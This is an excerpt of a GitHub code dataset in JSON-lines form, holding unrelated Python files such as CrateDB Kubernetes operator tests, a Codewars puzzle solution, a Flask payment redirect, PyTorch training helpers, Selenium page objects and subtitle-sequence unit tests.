apps.list_namespaced_stateful_set(namespace=namespace)\n return name in (s.metadata.name for s in stss.items)\n\n async def test_create(self, faker, namespace, api_client):\n apps = AppsV1Api(api_client)\n core = CoreV1Api(api_client)\n name = faker.domain_word()\n cluster_name = faker.domain_word()\n node_name = faker.domain_word()\n await create_statefulset(\n None,\n namespace.metadata.name,\n name,\n {\n LABEL_MANAGED_BY: \"crate-operator\",\n LABEL_NAME: name,\n LABEL_PART_OF: \"cratedb\",\n LABEL_COMPONENT: \"cratedb\",\n },\n True,\n True,\n cluster_name,\n node_name,\n f\"data-{node_name}-\",\n {\n \"replicas\": 3,\n \"resources\": {\n \"requests\": {\n \"cpu\": 0.5,\n \"memory\": \"1Gi\",\n },\n \"limits\": {\n \"cpu\": 0.5,\n \"memory\": \"1Gi\",\n },\n \"heapRatio\": 0.4,\n \"disk\": {\"count\": 1, \"size\": \"16Gi\", \"storageClass\": \"default\"},\n },\n },\n [\"master-1\", \"master-2\", \"master-3\"],\n 3,\n 3,\n 10000,\n 20000,\n 30000,\n 40000,\n 50000,\n f\"crate:{CRATE_VERSION}\",\n {\n \"keystore\": {\"secretKeyRef\": {\"key\": \"keystore\", \"name\": \"sslcert\"}},\n \"keystoreKeyPassword\": {\n \"secretKeyRef\": {\"key\": \"keystore-key-password\", \"name\": \"sslcert\"}\n },\n \"keystorePassword\": {\n \"secretKeyRef\": {\"key\": \"keystore-password\", \"name\": \"sslcert\"}\n },\n },\n {},\n [],\n logging.getLogger(__name__),\n )\n await assert_wait_for(\n True,\n self.does_statefulset_exist,\n apps,\n namespace.metadata.name,\n f\"crate-data-{node_name}-{name}\",\n )\n await assert_wait_for(\n True,\n do_pods_exist,\n core,\n namespace.metadata.name,\n {f\"crate-data-{node_name}-{name}-{i}\" for i in range(3)},\n )\n\n\nclass TestServiceModels:\n @pytest.mark.parametrize(\"dns\", [None, \"mycluster.example.com\"])\n @pytest.mark.parametrize(\"provider\", [None, \"aws\", \"azure\"])\n def test_get_data_service(self, provider, dns, faker):\n name = faker.domain_word()\n http = faker.port_number()\n psql = faker.port_number()\n with mock.patch(\"crate.operator.create.config.CLOUD_PROVIDER\", provider):\n service = get_data_service(None, name, None, http, psql, dns)\n annotation_keys = service.metadata.annotations.keys()\n if provider == \"aws\":\n assert (\n \"service.beta.kubernetes.io/aws-load-balancer-connection-draining-enabled\" # noqa\n in annotation_keys\n )\n assert (\n \"service.beta.kubernetes.io/aws-load-balancer-connection-draining-timeout\" # noqa\n in annotation_keys\n )\n assert (\n \"service.beta.kubernetes.io/aws-load-balancer-connection-idle-timeout\" # noqa\n in annotation_keys\n )\n assert (\n \"service.beta.kubernetes.io/aws-load-balancer-type\" # noqa\n in annotation_keys\n )\n if provider == \"azure\":\n assert (\n \"service.beta.kubernetes.io/azure-load-balancer-disable-tcp-reset\"\n in annotation_keys\n )\n assert (\n \"service.beta.kubernetes.io/azure-load-balancer-tcp-idle-timeout\"\n in annotation_keys\n )\n if dns:\n assert (\n service.metadata.annotations[\n \"external-dns.alpha.kubernetes.io/hostname\"\n ]\n == dns\n )\n\n\n@pytest.mark.k8s\n@pytest.mark.asyncio\nclass TestServices:\n async def do_services_exist(\n self, core: CoreV1Api, namespace: str, expected: Set[str]\n ) -> bool:\n services = await core.list_namespaced_service(namespace)\n return expected.issubset({s.metadata.name for s in services.items})\n\n @pytest.mark.parametrize(\n \"annotations\",\n [\n None,\n {\"some/annotation.id\": \"what\"},\n {\n \"some/annotation.id\": \"what\",\n \"external-dns.alpha.kubernetes.io/hostname\": \"override\",\n },\n ],\n )\n async def test_create(self, faker, namespace, api_client, annotations):\n core = CoreV1Api(api_client)\n name = faker.domain_word()\n host = faker.domain_name()\n await create_services(\n None,\n namespace.metadata.name,\n name,\n {},\n 1,\n 2,\n 3,\n host,\n logging.getLogger(__name__),\n additional_annotations=annotations,\n )\n\n expected_annotations = {\"external-dns.alpha.kubernetes.io/hostname\": host}\n if annotations:\n expected_annotations.update(annotations)\n\n await assert_wait_for(\n True,\n self.do_services_exist,\n core,\n namespace.metadata.name,\n {f\"crate-{name}\", f\"crate-discovery-{name}\"},\n )\n service = await core.read_namespaced_service(\n f\"crate-{name}\", namespace.metadata.name\n )\n assert service.spec.load_balancer_source_ranges is None\n assert service.metadata.annotations == expected_annotations\n\n async def test_create_with_source_ranges(self, faker, namespace, api_client):\n core = CoreV1Api(api_client)\n name = faker.domain_word()\n await create_services(\n None,\n namespace.metadata.name,\n name,\n {},\n 1,\n 2,\n 3,\n faker.domain_name(),\n logging.getLogger(__name__),\n source_ranges=[\"192.168.1.1/32\", \"10.0.0.0/8\"],\n )\n\n await assert_wait_for(\n True,\n self.do_services_exist,\n core,\n namespace.metadata.name,\n {f\"crate-{name}\", f\"crate-discovery-{name}\"},\n )\n service = await core.read_namespaced_service(\n f\"crate-{name}\", namespace.metadata.name\n )\n assert service.spec.load_balancer_source_ranges == [\n \"192.168.1.1/32\",\n \"10.0.0.0/8\",\n ]\n\n\n@pytest.mark.k8s\n@pytest.mark.asyncio\nclass TestSystemUser:\n async def does_secret_exist(\n self, core: CoreV1Api, namespace: str, name: str\n ) -> bool:\n secrets = await core.list_namespaced_secret(namespace)\n return name in (s.metadata.name for s in secrets.items)\n\n async def test_create(self, faker, namespace, api_client):\n core = CoreV1Api(api_client)\n name = faker.domain_word()\n password = faker.password(length=12)\n with mock.patch(\"crate.operator.create.gen_password\", return_value=password):\n await create_system_user(\n None, namespace.metadata.name, name, {}, logging.getLogger(__name__)\n )\n await assert_wait_for(\n True,\n self.does_secret_exist,\n core,\n namespace.metadata.name,\n f\"user-system-{name}\",\n )\n secrets = (await core.list_namespaced_secret(namespace.metadata.name)).items\n secret = next(\n filter(lambda x: x.metadata.name == f\"user-system-{name}\", secrets)\n )\n assert b64decode(secret.data[\"password\"]) == password\n\n\n@pytest.mark.k8s\n@pytest.mark.asyncio\nclass TestCreateCustomResource:\n async def does_statefulset_exist(\n self, apps: AppsV1Api, namespace: str, name: str\n ) -> bool:\n stss = await apps.list_namespaced_stateful_set(namespace=namespace)\n return name in (s.metadata.name for s in stss.items)\n\n async def do_services_exist(\n self, core: CoreV1Api, namespace: str, expected: Set[str]\n ) -> bool:\n services = await core.list_namespaced_service(namespace)\n return expected.issubset({s.metadata.name for s in services.items})\n\n async def test_create_minimal(self, faker, namespace, kopf_runner, api_client):\n apps = AppsV1Api(api_client)\n coapi = CustomObjectsApi(api_client)\n core = CoreV1Api(api_client)\n name = faker.domain_word()\n\n await start_cluster(name, namespace, core, coapi, 1, wait_for_healthy=False)\n await assert_wait_for(\n True,\n self.does_statefulset_exist,\n apps,\n namespace.metadata.name,\n f\"crate-data-hot-{name}\",\n )\n await assert_wait_for(\n True,\n do_pods_exist,\n core,\n namespace.metadata.name,\n {f\"crate-data-hot-{name}-0\"},\n )\n\n async def test_create_with_svc_annotations(\n self, faker, namespace, kopf_runner, api_client\n ):\n coapi = CustomObjectsApi(api_client)\n core = CoreV1Api(api_client)\n name = faker.domain_word()\n\n await start_cluster(\n name,\n namespace,\n core,\n coapi,\n 1,\n wait_for_healthy=False,\n additional_cluster_spec={\n \"service\": {\"annotations\": {\"some/annotation\": \"some.value\"}}\n },\n )\n await assert_wait_for(\n True,\n self.do_services_exist,\n core,\n namespace.metadata.name,\n {f\"crate-{name}\"},\n )\n service = await core.read_namespaced_service(\n f\"crate-{name}\", namespace.metadata.name\n )\n assert service.metadata.annotations[\"some/annotation\"] == \"some.value\"\n\n async def test_preserve_unknown_object_keys(\n self, faker, namespace, cratedb_crd, api_client\n ):\n # We don't actually run the operator in this test, since we only want\n # to retrieve the custom resource from K8s again and make sure that\n # all object keys are still present.\n coapi = CustomObjectsApi(api_client)\n name = faker.domain_word()\n\n await coapi.create_namespaced_custom_object(\n group=API_GROUP,\n version=\"v1\",\n plural=RESOURCE_CRATEDB,\n namespace=namespace.metadata.name,\n body={\n \"apiVersion\": \"cloud.crate.io/v1\",\n \"kind\": \"CrateDB\",\n \"metadata\": {\"name\": name},\n \"spec\": {\n \"cluster\": {\n \"imageRegistry\": \"crate\",\n \"name\": \"my-crate-cluster\",\n \"settings\": {\"s.c.s\": \"1\"},\n \"version\": CRATE_VERSION,\n },\n \"nodes\": {\n \"data\": [\n {\n \"annotations\": {\"s.n.d.0.a\": \"1\"},\n \"name\": \"data\",\n \"labels\": {\"s.n.d.0.l\": \"1\"},\n \"replicas\": 1,\n \"resources\": {\n \"requests\": {\n \"cpu\": 0.5,\n \"memory\": \"1Gi\",\n },\n \"limits\": {\n \"cpu\": 0.5,\n \"memory\": \"1Gi\",\n },\n \"heapRatio\": 0.25,\n \"disk\": {\n \"storageClass\": \"default\",\n \"size\": \"16GiB\",\n \"count\": 1,\n },\n },\n \"settings\": {\"s.n.d.0.s\": \"1\"},\n },\n ],\n \"master\": {\n \"annotations\": {\"s.n.m.a\": \"1\"},\n \"labels\": {\"s.n.m.l\": \"1\"},\n \"replicas\": 3,\n \"resources\": {\n \"requests\": {\n \"cpu\": 0.5,\n \"memory\": \"1Gi\",\n },\n \"limits\": {\n \"cpu\": 0.5,\n \"memory\": \"1Gi\",\n },\n \"heapRatio\": 0.25,\n \"disk\": {\n \"storageClass\": \"default\",\n \"size\": \"16GiB\",\n \"count\": 1,\n },\n },\n \"settings\": {\"s.n.m.s\": \"1\"},\n },\n },\n },\n \"status\": {\"foo\": \"bar\", \"buz\": {\"lorem\": \"ipsum\"}},\n },\n )\n\n resource = await coapi.get_namespaced_custom_object(\n group=API_GROUP,\n version=\"v1\",\n plural=RESOURCE_CRATEDB,\n namespace=namespace.metadata.name,\n name=name,\n )\n assert resource[\"spec\"][\"cluster\"][\"settings\"] == {\"s.c.s\": \"1\"}\n assert resource[\"spec\"][\"nodes\"][\"data\"][0][\"annotations\"] == {\"s.n.d.0.a\": \"1\"}\n assert resource[\"spec\"][\"nodes\"][\"data\"][0][\"labels\"] == {\"s.n.d.0.l\": \"1\"}\n assert resource[\"spec\"][\"nodes\"][\"data\"][0][\"settings\"] == {\"s.n.d.0.s\": \"1\"}\n assert resource[\"spec\"][\"nodes\"][\"master\"][\"annotations\"] == {\"s.n.m.a\": \"1\"}\n assert resource[\"spec\"][\"nodes\"][\"master\"][\"labels\"] == {\"s.n.m.l\": \"1\"}\n assert resource[\"spec\"][\"nodes\"][\"master\"][\"settings\"] == {\"s.n.m.s\": \"1\"}\n assert resource[\"status\"] == {\"foo\": \"bar\", \"buz\": {\"lorem\": \"ipsum\"}}\n\n\ndef test_sql_exporter_config():\n result = get_sql_exporter_config(None, \"test-name\", None)\n assert result.metadata.name == \"crate-sql-exporter-test-name\"\n\n _, _, filenames = next(walk(\"crate/operator/data\"))\n\n assert len(result.data) == len(filenames)\n for filename in filenames:\n assert filename in result.data.keys()\n assert result.data[filename] is not None\n\n\n@pytest.mark.parametrize(\n (\"node_spec\", \"is_shared\"),\n [\n (\n {\n \"resources\": {\n \"limits\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n \"requests\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n },\n },\n False,\n ),\n (\n {\n \"resources\": {\n \"limits\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n },\n },\n False,\n ),\n (\n {\n \"resources\": {\"cpus\": 0.5, \"memory\": \"8589934592\"},\n },\n False,\n ),\n (\n {\n \"resources\": {\n \"limits\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n \"requests\": {\"cpu\": 0.25, \"memory\": \"8589934592\"},\n },\n },\n True,\n ),\n ],\n)\ndef test_is_shared_resources_cluster(node_spec, is_shared):\n assert is_shared_resources_cluster(node_spec) == is_shared\n\n\n@pytest.mark.parametrize(\n (\"node_spec\", \"expected_requests_cpu\"),\n [\n (\n {\n \"resources\": {\n \"limits\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n \"requests\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n },\n },\n 0.5,\n ),\n (\n {\n \"resources\": {\n \"limits\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n },\n },\n 0.5,\n ),\n (\n {\n \"resources\": {\"cpus\": 0.5, \"memory\": \"8589934592\"},\n },\n 0.5,\n ),\n (\n {\n \"resources\": {\n \"limits\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n \"requests\": {\"cpu\": 0.25, \"memory\": \"8589934592\"},\n },\n },\n 0.25,\n ),\n ],\n)\ndef test_get_cluster_resource_requests(node_spec, expected_requests_cpu):\n assert (\n get_cluster_resource_requests(\n node_spec, resource_type=\"cpu\", fallback_key=\"cpus\"\n )\n == expected_requests_cpu\n )\n\n\n@pytest.mark.parametrize(\n (\"node_spec\", \"expected_limits_cpu\"),\n [\n (\n {\n \"resources\": {\n \"limits\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n \"requests\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n },\n },\n 0.5,\n ),\n (\n {\n \"resources\": {\n \"limits\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n },\n },\n 0.5,\n ),\n (\n {\n \"resources\": {\"cpus\": 0.5, \"memory\": \"8589934592\"},\n },\n 0.5,\n ),\n (\n {\n \"resources\": {\n \"limits\": {\"cpu\": 0.5, \"memory\": \"8589934592\"},\n \"requests\": {\"cpu\": 0.25, \"memory\": \"8589934592\"},\n },\n },\n 0.5,\n ),\n ],\n)\ndef test_get_cluster_resource_limits(node_spec, expected_limits_cpu):\n assert (\n get_cluster_resource_limits(node_spec, resource_type=\"cpu\", fallback_key=\"cpus\")\n == expected_limits_cpu\n )\n","repo_name":"crate/crate-operator","sub_path":"tests/test_create.py","file_name":"test_create.py","file_ext":"py","file_size_in_byte":48192,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"52"} +{"seq_id":"37189165209","text":"def escape(carpark):\n result = []\n floors = len(carpark)-1\n for i, floor in enumerate(carpark):\n if 2 in floor:\n start = i\n point = find(carpark[start], 2)\n while start <= floors:\n index = find(carpark[start], 1)\n res = 0\n if index == -1:\n res = point - (len(carpark[start]) - 1)\n result = add(result, res)\n else:\n res = point - index\n result = add(result, res)\n if result[-1][0] ==\"D\":\n result[-1] = \"D\"+ str(int(result[-1][1])+1)\n else:\n result.append('D1')\n point = index\n start += 1\n return result\n\n\ndef find(arr, number):\n index = -1\n for i, j in enumerate(arr):\n if j == number:\n index = i\n break\n return index\n\n\ndef add(arr, number):\n if number:\n if number < 0:\n arr.append('R'+str(abs(number)))\n else:\n arr.append('L'+str(number))\n return arr\n else:\n return arr\n\n# carpark = [[1, 0, 0, 0, 2],\n# [0, 0, 0, 0, 0],\n# ]\n# result = [\"L4\", \"D1\", \"R4\"]\n\ncarpark = [[1, 0, 0, 0, 2],\n [0, 0, 0, 0, 1],\n [1, 0, 0, 0, 0],\n [0, 0, 0, 0, 0]]\n # result = [\"L4\", \"D1\", \"R4\", \"D1\", \"L4\", \"D1\", \"R4\"]\n\n\nprint(escape(carpark))","repo_name":"alex3287/codewars","sub_path":"5 kyu/CarParkEscape.py","file_name":"CarParkEscape.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31737551939","text":"import turtle\nt = turtle\nt.bgcolor(\"pink\")\n\nt.pen(pencolor=\"red\", fillcolor=\"lightgreen\", \n pensize=2, speed=0)\n\nt.penup()\nt.bk(400)\nt.pendown()\n\nfor i in range(180): \n t.forward(600)\n t.right(182)\n t.penup()\n t.bk(100)\n t.pendown()\n\nt.penup()\nt.backward(200)\nt.pendown()\nt.Screen().exitonclick()","repo_name":"jupeke/python","sub_path":"turtle/flower_fast.py","file_name":"flower_fast.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32037648521","text":"from flask import Flask, render_template, request, redirect\nfrom utils import Util\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n username = request.args.get('name')\n return render_template('index.html', name=username)\n\n@app.route(\"/payment\", methods=['POST'])\ndef payment():\n amount = request.form['amount']\n rs = Util.momo_payment_excute(amount)\n url_payment = rs['payUrl']\n return redirect(url_payment)\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"hoanganpro2030/AssTMDT","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35164230051","text":"from __future__ import print_function, division\nfrom .multiple import Multiple, tempdir\n\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom torchvision import models, transforms\n\nimport os\nimport copy\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\n\nmultiple = Multiple()\n\n\ncudnn.benchmark = True\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef download_file(path):\n dest = os.path.join(tempdir, path)\n if not os.path.exists(dest):\n os.makedirs(os.path.dirname(dest), exist_ok=True)\n multiple.download_file(path, dest)\n return dest\n\n\ndef read_image(path):\n dest = download_file(path)\n return Image.open(dest)\n\n\nclass Dataset(torch.utils.data.Dataset):\n def __init__(self, root_dir, transform=None, target_transform=None):\n paths, labels = multiple.load_dataset(root_dir)\n self.paths = paths\n self.labels = labels\n self.root_dir = root_dir\n self.transform = transform\n self.target_transform = target_transform\n self.classes = list(np.sort(np.unique(labels)))\n\n def __len__(self):\n return len(self.paths)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n path = self.paths[idx]\n label = self.labels[idx]\n label = self.classes.index(label)\n img = read_image(path)\n if self.transform:\n img = self.transform(img)\n if self.target_transform:\n label = self.target_transform(label)\n return img, label\n\n\ndef create_model(class_names, pretrained=True):\n model = models.resnet18(pretrained=pretrained)\n for param in model.parameters():\n param.requires_grad = False\n num_ftrs = model.fc.in_features\n model.fc = torch.nn.Linear(num_ftrs, len(class_names))\n return model\n\n\ndef save_model(path, model, device='cpu'):\n src = os.path.join(tempdir, path)\n os.makedirs(os.path.dirname(src), exist_ok=True)\n model.to(device)\n torch.save(model.state_dict(), src)\n multiple.upload_file(src, path)\n\n\ndef load_model(path, class_names):\n dest = download_file(path)\n model = create_model(class_names, pretrained=False)\n model.load_state_dict(torch.load(dest))\n return model\n\n\ndef save_classes(path, class_names):\n txt = '\\n'.join(class_names)\n multiple.save_file(path, txt)\n\n\ndef load_classes(path):\n txt = multiple.load_file(path)\n return [line.strip() for line in txt.splitlines()]\n\n\ntransform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]\n )\n])\n\n\n# License: BSD\n# Author: Sasank Chilamkurthy\n\ndef train_model(model, dataloaders, criterion, optimizer, scheduler, num_epochs=25):\n since = time.time()\n\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n\n for epoch in range(num_epochs):\n print(f'Epoch {epoch}/{num_epochs - 1}')\n print('-' * 10)\n\n # Each epoch has a training and validation phase\n for phase in ['train', 'val']:\n if phase == 'train':\n model.train() # Set model to training mode\n else:\n model.eval() # Set model to evaluate mode\n\n running_loss = 0.0\n running_corrects = 0\n\n # Iterate over data.\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward\n # track history if only in train\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n\n # backward + optimize only if in training phase\n if phase == 'train':\n loss.backward()\n optimizer.step()\n\n # statistics\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n if phase == 'train':\n scheduler.step()\n\n epoch_loss = running_loss / len(dataloaders[phase].dataset)\n epoch_acc = running_corrects.double() / len(dataloaders[phase].dataset)\n\n print(f'{phase} Loss: {epoch_loss:.4f} Acc: {epoch_acc:.4f}')\n\n # deep copy the model\n if phase == 'val' and epoch_acc > best_acc:\n best_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n\n print()\n\n time_elapsed = time.time() - since\n print(f'Training complete in {time_elapsed // 60:.0f}m {time_elapsed % 60:.0f}s')\n print(f'Best val Acc: {best_acc:4f}')\n\n # load best model weights\n model.load_state_dict(best_model_wts)\n return model\n\n\ndef imshow(inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = inp.numpy().transpose((1, 2, 0))\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n plt.imshow(inp)\n if title is not None:\n plt.title(title)\n plt.pause(0.001) # pause a bit so that plots are updated\n\n\ndef visualize_model(model, dataloaders, num_images=6):\n dataloader = dataloaders['val']\n class_names = dataloader.dataset.classes\n was_training = model.training\n model.eval()\n images_so_far = 0\n fig = plt.figure()\n\n with torch.no_grad():\n for i, (inputs, labels) in enumerate(dataloader):\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n\n for j in range(inputs.size()[0]):\n images_so_far += 1\n ax = plt.subplot(num_images//2, 2, images_so_far)\n ax.axis('off')\n ax.set_title(f'predicted: {class_names[preds[j]]}')\n imshow(inputs.cpu().data[j])\n\n if images_so_far == num_images:\n model.train(mode=was_training)\n return\n model.train(mode=was_training)\n ","repo_name":"abraia/abraia-multiple","sub_path":"abraia/torch.py","file_name":"torch.py","file_ext":"py","file_size_in_byte":6388,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"36792029841","text":"from selenium.webdriver.common.by import By\nfrom src.framework.ui.element import Element\nfrom src.objects.pages.base_page import BasePage\nfrom src.objects.locators.registration_page import StudentRegistrationPageLocators\n\n\nclass CoachRegistrationPage(BasePage):\n def __init__(self, driver):\n super().__init__(driver)\n\n self.coach_first_name_input = Element(self.driver, By.XPATH, \"//input[@name='general-first_name']\")\n self.coach_last_name_input = Element(self.driver, By.XPATH, \"//input[@name='general-last_name']\")\n self.coach_email_input = Element(self.driver, By.XPATH, \"//input[@name='general-email']\")\n self.coach_company_input = Element(self.driver, By.XPATH, \"//input[@name='general-company']\")\n self.coach_phone_input = Element(self.driver, By.XPATH, \"//input[@name='general-phone']\")\n self.coach_card_number_input = Element(self.driver, By.XPATH, \"//input[@name='general-card_number']\")\n self.coach_cvc_input = Element(self.driver, By.XPATH, \"//input[@name='general-card_cvc']\")\n self.coach_card_year_droplist_arrow_icon = Element(self.driver, By.XPATH, \"//ul[@data-input='general-card_exp_year']//*[@class='icon']\")\n self.terms_and_conditions_checkbox = Element(self.driver, By.XPATH, \"//*[@class='check__box']\")\n self.terms_and_conditions_check_input = Element(self.driver, By.XPATH, \"//input[@class='check__input']\")\n self.terms_and_conditions_link = Element(self.driver, By.XPATH, \"//a[contains(.,'conditions')]\")\n self.create_your_account_button = Element(self.driver, By.XPATH, \"//button[@type='submit']\")\n self.validation_message = Element(self.driver, By.XPATH, \"//p[@class='validation-message']\")\n self.card_type_droplist = Element(self.driver, By.XPATH, \"//label[contains(text(),'Card type')]//ul\")\n self.selected_card_type = Element(self.driver, By.XPATH, \"//label[contains(text(),'Card type')]//li[contains(@class,'selected')]\")\n self.coach_site_name_input = Element(self.driver, By.XPATH, \"//input[@id='registration-site-name']\")\n self.coach_card_year_item = Element(self.driver, By.XPATH, \"//ul[@data-input='general-card_exp_year']//li[contains(@class,'select-item')]\")\n self.subdomain_input = Element(self.driver, By.XPATH, \"//input[@id='registration-site-name']\")\n self.confirm_subdomain_button = Element(self.driver, By.XPATH, \"//form[@data-validate-url='/validate_subdomain']//button\")\n\n def fill_form(self, data):\n self.coach_first_name_input.type_value(data[\"fname\"])\n self.coach_last_name_input.type_value(data[\"lname\"])\n self.coach_email_input.type_value(data[\"email\"])\n self.coach_company_input.type_value(data[\"business\"])\n self.coach_phone_input.type_value(data[\"phone\"])\n self.select_card_type(data[\"card_type\"])\n self.coach_card_number_input.type_value(data[\"card_number\"])\n self.coach_cvc_input.type_value(data[\"cvc\"])\n self.select_year(data[\"year\"])\n self.terms_and_conditions_checkbox.click()\n\n def select_year(self, year):\n self.coach_card_year_droplist_arrow_icon.click()\n Element(self.driver, By.XPATH, f\"//li[@data-value='{year}']\").click()\n\n def select_card_type(self, card_type):\n if self.selected_card_type.get_text() not in card_type:\n self.card_type_droplist.click()\n Element(self.driver, By.XPATH, f\"//li[contains(@class,'select-item')][contains(text(),'{card_type}')]\").click()\n\n def submit_form(self):\n self.create_your_account_button.click()\n\n def is_next_registration_step_open(self):\n return self.coach_site_name_input.is_displayed()\n\n def is_email_field_have_email_type(self):\n return self.coach_email_input.get_attribute(\"type\") == \"email\"\n\n def is_validation_message_displayed(self):\n return self.validation_message.is_displayed()\n\n def is_not_past_year_in_years_list(self, current_year):\n return str(current_year - 1) not in [item.get_attribute(\"data-value\") for item in self.coach_card_year_item.as_list()]\n\n def is_special_chars_in_subdomain(self, subdomain):\n return True if [i for i in subdomain if i in self.subdomain_input.get_attribute(\"value\")] else False\n\n def is_terms_and_conditions_page_open(self):\n return \"https://howto.xperiencify.com/article.php?article=terms\" in self.driver.current_url\n\n def open_terms_and_conditions_page(self):\n self.terms_and_conditions_link.click()\n self.switch_tab(1)\n\n def uncheck_terms_and_conditions(self):\n if self.terms_and_conditions_check_input.is_selected():\n self.terms_and_conditions_checkbox.click()\n\n\nclass StudentRegistrationPage(BasePage):\n def __init__(self, driver):\n super().__init__(driver)\n self.locators = StudentRegistrationPageLocators()\n\n self.create_an_account_link = Element(self.driver, By.XPATH, \"//button[contains(text(),'Create')]\")\n self.student_registration_form = Element(self.driver, By.XPATH, \"//form[@class='signin']\")\n self.first_name_input = Element(self.driver, By.XPATH, \"//input[@name='first_name']\")\n self.last_name_input = Element(self.driver, By.XPATH, \"//input[@name='last_name']\")\n self.email_input = Element(self.driver, By.XPATH, \"//input[@name='email']\")\n self.password_input = Element(self.driver, By.XPATH, \"//input[@name='password1']\")\n self.confirm_password_input = Element(self.driver, By.XPATH, \"//input[@name='password2']\")\n self.sign_up_button = Element(self.driver, By.XPATH, \"//button[@name='signin']\")\n\n def get_error_message_text(self, locator):\n return Element(self.driver, By.XPATH, f\"{locator}//following-sibling::*\").get_text()\n\n def is_validation_message_displayed(self, locator, error):\n \"\"\"\n :param locator: The locator of the item to check for errors\n :param error: Error text\n :return: Boolean\n \"\"\"\n return error in self.get_error_message_text(locator)\n\n def open_registration_form(self):\n self.create_an_account_link.click()\n self.student_registration_form.wait_for_visibility()\n\n def fill_form(self, data):\n self.first_name_input.type_value(data[\"fname\"])\n self.last_name_input.type_value(data[\"lname\"])\n self.email_input.type_value(data[\"email\"])\n self.password_input.type_value(data[\"pass1\"])\n self.confirm_password_input.type_value(data[\"pass2\"])\n self.sign_up_button.click()\n","repo_name":"BobrovPavel/for_visitors","sub_path":"xperiencify-auto-tests/src/objects/pages/registration_page.py","file_name":"registration_page.py","file_ext":"py","file_size_in_byte":6513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29584771930","text":"from unittest import TestCase\nfrom datetime import timedelta, datetime\nfrom ebu_tt_live.documents import EBUTT3Document, EBUTT3DocumentSequence\nfrom ebu_tt_live.clocks.local import LocalMachineClock\nfrom ebu_tt_live.bindings._ebuttdt import LimitedClockTimingType\nfrom ebu_tt_live.errors import SequenceNumberCollisionError, UnexpectedAuthorsGroupError\n\n\nclass TestEBUTT3Sequence(TestCase):\n\n def _get_timing_type(self, value):\n if self.reference_clock.time_base == 'clock':\n return LimitedClockTimingType(value)\n\n def _create_document(self, begin, end):\n doc = self.sequence.new_document()\n doc.set_begin(self._get_timing_type(timedelta(seconds=begin)))\n doc.set_end(self._get_timing_type(timedelta(seconds=end)))\n doc.availability_time = timedelta()\n return doc\n\n def setUp(self):\n self.reference_clock = LocalMachineClock()\n self.sequence = EBUTT3DocumentSequence(\n sequence_identifier='sequenceTesting',\n reference_clock=self.reference_clock,\n lang='en-GB'\n )\n\n self.document1 = self._create_document(1, 2)\n self.document2 = self._create_document(3, 4)\n self.document3 = self._create_document(5, 6)\n\n def test_repeated_sequence_number(self):\n \"\"\"\n This test tries to add the same sequence number twice. It should fail\n \"\"\"\n self.document4 = self._create_document(7, 8)\n self.document4.sequence_number -= 1\n self.sequence.add_document(self.document1)\n self.sequence.add_document(self.document2)\n self.sequence.add_document(self.document3)\n\n self.assertRaises(SequenceNumberCollisionError, self.sequence.add_document, self.document4)\n\n def test_sequence_add1(self):\n \"\"\"\n This tests an out of order document reception\n :return:\n \"\"\"\n self.sequence.add_document(self.document1)\n self.sequence.add_document(self.document3)\n self.sequence.add_document(self.document2)\n\n self.assertEqual(\n self.document1.resolved_begin_time,\n timedelta(seconds=1)\n )\n self.assertEqual(\n self.document2.resolved_begin_time,\n timedelta(seconds=3)\n )\n self.assertEqual(\n self.document3.resolved_begin_time,\n timedelta(seconds=5)\n )\n\n self.assertEqual(\n self.document1.resolved_end_time,\n timedelta(seconds=2)\n )\n self.assertEqual(\n self.document2.resolved_end_time,\n timedelta(seconds=4)\n )\n self.assertEqual(\n self.document3.resolved_end_time,\n timedelta(seconds=6)\n )\n\n def test_sequence_add2(self):\n \"\"\"\n This test swaps 2 sequence numbers thereby creating an erasure\n :return:\n \"\"\"\n self.document2.sequence_number = 3\n self.document3.sequence_number = 2\n self.document2.validate()\n self.document3.validate()\n self.document1.validate()\n\n 